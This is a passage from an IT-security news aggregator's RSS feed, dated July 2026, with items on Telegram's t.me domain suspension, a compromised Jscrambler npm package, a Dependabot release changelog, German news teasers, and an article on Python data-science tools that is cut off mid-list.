<description><![CDATA[Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status flags, including serverHold, clientDeletePro...]]></description>
<link>https://tsecurity.de/de/3666723/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666723/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 04:53:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status flags, including serverHold, clientDeleteProhibited, and serverDeleteProhibited, with an update timestamp of 2026-07-13T19:24:55Z. The domain remains […]</p>
<p>The post <a href="https://cybersecuritynews.com/telegrams-t-me-domain-suspended/">Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Compromised Jscrambler npm Releases Target Developer Environments with Cross-Platform Rust Infostealer]]></title>
<description><![CDATA[  Developers and organizations using the Jscrambler npm package are being urged to audit their systems after multiple malicious releases were uploaded to the npm registry through a compromised publishing credential. The incident transformed a trusted development dependency into a…
Read more →
The...]]></description>
<link>https://tsecurity.de/de/3665920/it-security-nachrichten/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665920/it-security-nachrichten/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/</guid>
<pubDate>Mon, 13 Jul 2026 18:39:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Developers and organizations using the Jscrambler npm package are being urged to audit their systems after multiple malicious releases were uploaded to the npm registry through a compromised publishing credential. The incident transformed a trusted development dependency into a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/compromised-jscrambler-npm-releases-target-developer-environments-with-cross-platform-rust-infostealer/">Compromised Jscrambler npm Releases Target Developer Environments with Cross-Platform Rust Infostealer</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.386.0]]></title>
<description><![CDATA[What's Changed

Capture offending gem details on bundler registry metadata errors by @kbukum1 in #15512
Bundler: apply empty-checksum metadata patch to the v2 helper by @kbukum1 in #15513
[Update graph] Ensure bystander txt files are removed before parsing for Python by @brrygrdn in #15508
Handle...]]></description>
<link>https://tsecurity.de/de/3665919/it-security-tools/v03860/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665919/it-security-tools/v03860/</guid>
<pubDate>Mon, 13 Jul 2026 18:35:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Capture offending gem details on bundler registry metadata errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824191752" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15512" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15512/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15512">#15512</a></li>
<li>Bundler: apply empty-checksum metadata patch to the v2 helper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4824414250" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15513" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15513/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15513">#15513</a></li>
<li>[Update graph] Ensure bystander txt files are removed before parsing for Python by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4819771035" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15508" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15508/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15508">#15508</a></li>
<li>Handle global.json with no SDK version in dotnet_sdk parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4821557169" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15510" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15510/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15510">#15510</a></li>
<li>Type the cargo ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4810941973" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15492" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15492/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15492">#15492</a></li>
<li>Type the conda ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811676578" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15493" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15493/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15493">#15493</a></li>
<li>Type the docker ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4811747259" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15495" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15495/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15495">#15495</a></li>
<li>Use shared git-tag cooldown in terraform by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4786767074" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15472" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15472/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15472">#15472</a></li>
<li>Retry corepack once on signature metadata error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783580732" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15466" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15466/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15466">#15466</a></li>
<li>Type the deno, elm, devcontainers, bazel, and helm ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833014415" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15527" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15527/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15527">#15527</a></li>
<li>Add word-separator and lowercase formatting for branch name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4791908912" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15478" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15478/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15478">#15478</a></li>
<li>Fix Docker cooldown not respected for multi-arch images missing Last-Modified by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4796035244" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15486" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15486/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15486">#15486</a></li>
<li>Reduce redundant git-source probes during npm metadata resolution by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793483366" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15480" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15480/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15480">#15480</a></li>
<li>Type the maven ecosystem and remove it from the T.untyped burndown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4833182059" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15531" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15531/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15531">#15531</a></li>
<li>Add branch name config template format support with validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4835027976" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15535" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15535/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15535">#15535</a></li>
<li>fix(gradle): prefer local gradlew for lockfile updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4847310998" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15546" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15546/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15546">#15546</a></li>
<li>helm: support versioning-strategy (range-preserving updates) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4585878635" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15218" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15218/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15218">#15218</a></li>
<li>Bump gradle from 9.4.1-jdk21-ubi to 9.6.1-jdk21-ubi in /gradle by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4813506019" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15498" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15498/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15498">#15498</a></li>
<li>[Update graph] Add support for requirements.txt 'layering' instead of compressing to a single file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4829476790" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15521" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15521/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15521">#15521</a></li>
<li>Allow periods in Helm values file names for Docker ecosystem by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li>Match existing group PRs covering a subset of job directories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IanButterworth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IanButterworth">@IanButterworth</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4850701816" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15548" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15548/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15548">#15548</a></li>
<li>Bump library/golang from 1.26.1-bookworm to 1.26.5-bookworm in /go_modules by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4867732850" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15562" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15562/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15562">#15562</a></li>
<li>Fix npm security updates for transitive dependencies in workspace monorepos by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
<li>Add helm to the smoke-test matrix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/casey-robertson-paypal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/casey-robertson-paypal">@casey-robertson-paypal</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4857335602" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15554" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15554/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15554">#15554</a></li>
<li>v0.386.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4869767530" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15564" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15564/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15564">#15564</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/telnet23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/telnet23">@telnet23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4862784915" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15557" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15557/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15557">#15557</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Swampen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Swampen">@Swampen</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826508534" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15514" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15514/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15514">#15514</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.385.0...v0.386.0"><tt>v0.385.0...v0.386.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Progress warnt Admins: ShareFile deaktivieren | heise online]]></title>
<description><![CDATA[Progress arbeite mit eigenen und externen IT-Sicherheitsexperten an der Untersuchung der potenziellen Bedrohung. Auf der Status-Seite zu ShareFile ...]]></description>
<link>https://tsecurity.de/de/3665841/it-security-nachrichten/progress-warnt-admins-sharefile-deaktivieren-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665841/it-security-nachrichten/progress-warnt-admins-sharefile-deaktivieren-heise-online/</guid>
<pubDate>Mon, 13 Jul 2026 18:23:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Progress arbeite mit eigenen und externen <b>IT</b>-Sicherheitsexperten an der Untersuchung der potenziellen Bedrohung. Auf der Status-Seite zu ShareFile ...]]></content:encoded>
</item>
<item>
<title><![CDATA[US-Behörde erlaubt höchst umstrittene Spiegel-Satelliten im Weltraum]]></title>
<description><![CDATA[Das Startup Reflect Orbital schickt noch in diesem Jahr einen riesigen Spiegel ins All, um Sonnenlicht auf die dunkle Seite der Erde zu lenken. Ziel des Unternehmens ist es, Solarparks und Rettungskräfte nachts gezielt zu beleuchten.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3665684/it-security-nachrichten/us-behoerde-erlaubt-hoechst-umstrittene-spiegel-satelliten-im-weltraum/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665684/it-security-nachrichten/us-behoerde-erlaubt-hoechst-umstrittene-spiegel-satelliten-im-weltraum/</guid>
<pubDate>Mon, 13 Jul 2026 17:09:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159948.html"><img hspace="5" border="0" align="left" alt="Weltraum, Orbit, Erdumlaufbahn, Reflect Orbital, Copernicus, Low-Earth-Orbit, Erdansicht, Weltraumbild, Weltraumspiegel" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/92023.jpg"></a>
			Das Startup Reflect Orbital schickt noch in diesem Jahr einen riesigen Spiegel ins All, um Sonnenlicht auf die dunkle Seite der Erde zu lenken. Ziel des Unternehmens ist es, Solarparks und Rettungskräfte nachts gezielt zu beleuchten.			(<a href="https://winfuture.de/news,159948.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[7 newer data science tools you should be using with Python]]></title>
<description><![CDATA[Python’s rich ecosystem of data science tools is a big draw for users. The only downside of such a broad and deep collection is that sometimes the best tools can get overlooked.



Here’s a rundown of some of the best newer or less-known data science projects available for Python. Some, like Pola...]]></description>
<link>https://tsecurity.de/de/3665680/ai-nachrichten/7-newer-data-science-tools-you-should-be-using-with-python/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665680/ai-nachrichten/7-newer-data-science-tools-you-should-be-using-with-python/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Python’s rich ecosystem of data science tools is a big draw for users. The only downside of such a broad and deep collection is that sometimes the best tools can get overlooked.</p>



<p class="wp-block-paragraph">Here’s a rundown of some of the best newer or less-known data science projects available for <a href="https://www.infoworld.com/article/2254260/how-to-get-started-with-python.html">Python</a>. Some, like Polars, are getting more attention but still deserve wider notice. Others, like ConnectorX, are hidden gems.</p>



<h2 class="wp-block-heading">ConnectorX</h2>



<p class="wp-block-paragraph">Most data sits in a database somewhere, but computation typically happens outside of it. Getting data to and from the database for actual work can be a slowdown. <a href="https://github.com/sfu-db/connector-x">ConnectorX</a> loads data from databases into many common data-wrangling tools in Python, and it keeps things fast by minimizing the work required. Most of the data loading can be done in just a couple of lines of Python code and <a href="https://www.infoworld.com/article/2255395/what-is-sql-the-lingua-franca-of-data-analysis.html">an SQL query</a>.</p>



<p class="wp-block-paragraph">Like Polars (which I’ll discuss shortly), ConnectorX uses a <a href="https://www.infoworld.com/article/2258463/rust-tutorial-get-started-with-the-rust-language.html">Rust</a> library at its core. This allows for optimizations like being able to load from a data source in parallel with partitioning. Data in <a href="https://www.infoworld.com/article/3489168/postgresql-tutorial-get-started-with-postgresql-16.html">PostgreSQL</a>, for instance, can be loaded this way by specifying a partition column.</p>



<p class="wp-block-paragraph">Aside from PostgreSQL, ConnectorX also supports reading from MySQL/MariaDB, SQLite, Amazon Redshift, Microsoft SQL Server and Azure SQL, and Oracle. The results can be funneled into a <a href="https://www.infoworld.com/article/2264264/how-to-use-pandas-for-data-analysis-in-python.html">Pandas</a> or PyArrow DataFrame, or into Modin or Dask (via Pandas), or Polars (via PyArrow). General support for reading from ODBC is a work in progress.</p>



<h2 class="wp-block-heading">DuckDB</h2>



<p class="wp-block-paragraph">Data science folks who use Python ought to be aware of <a href="https://www.infoworld.com/article/2337363/why-you-should-use-sqlite-3.html">SQLite</a>—a small, but powerful and speedy relational database packaged with Python. Since it runs as an in-process library, rather than a separate application, SQLite is lightweight and responsive.</p>



<p class="wp-block-paragraph"><a href="https://duckdb.org/">DuckDB</a> is a little like someone answered the question, “<a href="https://www.infoworld.com/article/2336981/duckdb-the-tiny-but-powerful-analytics-database.html">What if we made SQLite for OLAP?</a>” Like other <a href="https://www.infoworld.com/article/2334471/what-is-olap-analytical-databases.html">OLAP</a> database engines, it uses a columnar datastore and is optimized for long-running analytical query workloads. But DuckDB gives you all the things you expect from a conventional database, like ACID transactions. And there’s no separate software suite to configure; you can get it running in a Python environment with a single <code>pip install duckdb</code> command.</p>



<p class="wp-block-paragraph">DuckDB can directly ingest data in CSV, <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON</a>, or <a href="https://www.infoworld.com/article/2336762/exploring-the-apache-ecosystem-for-data-analysis.html">Parquet</a> format, as well as <a href="https://duckdb.org/docs/stable/data/data_sources">a slew of other common data sources</a>. The resulting databases can also be partitioned into multiple physical files for efficiency, based on keys (e.g., by year and month). Querying works like any other <a href="https://www.infoworld.com/article/2255395/what-is-sql-the-lingua-franca-of-data-analysis.html">SQL</a>-powered relational database, but with additional built-in features like the ability to take random samples of data or construct window functions.</p>



<p class="wp-block-paragraph">DuckDB also has a small but useful collection of extensions, including full-text search, <a href="https://duckdb.org/docs/stable/core_extensions/vss">accelerated vector similarity search</a>, Excel import/export, direct connections to SQLite and PostgreSQL, Parquet file export, and support for many common geospatial data formats and types.</p>



<h2 class="wp-block-heading">Optimus</h2>



<p class="wp-block-paragraph">One of the least enviable jobs you can be stuck with is cleaning and preparing data for use in a DataFrame-centric project. <a href="https://github.com/hi-primus/optimus">Optimus</a> is an all-in-one tool set for loading, exploring, cleansing, and writing data back out to a variety of data sources.</p>



<p class="wp-block-paragraph">Optimus can use <a href="https://www.infoworld.com/article/2264264/how-to-use-pandas-for-data-analysis-in-python.html">Pandas</a>, Dask, CUDF (and Dask + CUDF), Vaex, or <a href="https://www.infoworld.com/article/2259224/what-is-apache-spark-the-big-data-platform-that-crushed-hadoop.html">Spark</a> as its underlying data engine. Data can be loaded in from and saved back out to Arrow, Parquet, Excel, a variety of common database sources, or flat-file formats like CSV and JSON.</p>



<p class="wp-block-paragraph">The data manipulation API resembles Pandas, but adds <code>.rows()</code> and <code>.cols()</code> accessors to make it easy to do things like sort a DataFrame, filter by column values, alter data according to criteria, or narrow the range of operations based on some criteria. Optimus also comes bundled with processors for handling common real-world data types like email addresses and URLs.</p>



<p class="wp-block-paragraph">One possible issue with Optimus is that it’s still under active development but its last official release was in 2020. This means it might not be as current as other components in your stack.</p>



<h2 class="wp-block-heading">Polars</h2>



<p class="wp-block-paragraph">If you spend much time working with DataFrames and you’re frustrated by the performance limits of <a href="https://www.infoworld.com/article/2264264/how-to-use-pandas-for-data-analysis-in-python.html">Pandas</a>, reach for <a href="https://github.com/pola-rs/polars">Polars</a>. This DataFrame library for Python offers a convenient syntax similar to Pandas.</p>



<p class="wp-block-paragraph">Unlike Pandas, though, Polars uses a library written in <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a> that takes maximum advantage of your hardware out of the box. You don’t need to use special syntax to take advantage of performance-enhancing features like parallel processing or SIMD; it’s all automatic. Even simple operations like reading from a CSV file are faster. Rust developers can <a href="https://github.com/pola-rs/pyo3-polars">craft their own Polars extensions using pyo3</a>.</p>



<p class="wp-block-paragraph">Polars provides eager and lazy execution modes, so queries can be executed immediately or deferred until needed. It also provides a streaming API for processing queries incrementally. Streaming isn’t available yet for many functions, although Polars can always fall back to the in-memory engine for such operations if need be. You can also <a href="https://docs.pola.rs/api/python/stable/reference/lazyframe/api/polars.LazyFrame.show_graph.html">plot execution graphs for queries</a>, streaming or otherwise, if you want to get an idea of what memory or CPU consumption is like for the query (via the external Graphviz library).</p>



<h2 class="wp-block-heading">DVC</h2>



<p class="wp-block-paragraph">A major and pervasive issue with data science experiments is <a href="https://www.infoworld.com/article/2260350/version-control-track-the-who-what-and-when-of-software-changes.html">version control</a>—not of the project’s code, but its data. <a href="https://github.com/iterative/dvc">DVC</a>, short for Data Version Control, lets you attach version descriptors to datasets, check them into Git as you would the rest of your code, and keep versions of data and code consistent together.</p>



<p class="wp-block-paragraph">DVC can track most any kind of dataset as long as they can be expressed as a file, whether kept in local storage or in a <a href="https://dvc.org/doc/user-guide/data-management/remote-storage#supported-storage-types">remote storage service</a> like an Amazon S3 bucket. You can describe how data models are managed and used by way of a “<a href="https://dvc.org/doc/user-guide/data-management/remote-storage#supported-storage-types">pipeline</a>,” which DVC’s documentation describes as being like “a Makefile system for machine learning projects.”</p>



<p class="wp-block-paragraph">The use cases for DVC are intended to be more than just allowing data to be versioned alongside code. It also works as a fast data cache for remotely hosted data, a methodology for tracking experiments conducted with data, and a registry or catalog for <a href="https://www.infoworld.com/article/2254843/what-is-machine-learning-intelligence-derived-from-data.html">machine learning models</a> created with the data. <a href="https://www.infoworld.com/article/2254808/get-started-with-visual-studio-code.html">Visual Studio Code</a> users can integrate DVC workflows into the editor by way of the <a href="https://marketplace.visualstudio.com/items?itemName=Iterative.dvc">DVC VS Code extension</a>.</p>



<h2 class="wp-block-heading">Cleanlab</h2>



